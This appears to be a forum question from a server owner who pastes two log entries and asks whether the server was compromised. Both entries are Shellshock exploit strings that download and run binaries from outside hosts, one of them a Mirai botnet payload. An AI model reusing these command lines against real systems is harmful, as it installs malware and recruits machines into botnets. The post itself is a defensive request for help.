I am wondering if my server is compromised or not. I just looked at my log and seen the following line in there:
IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'
I am not sure if they were able to execute that command successfully or not. I shut my server off.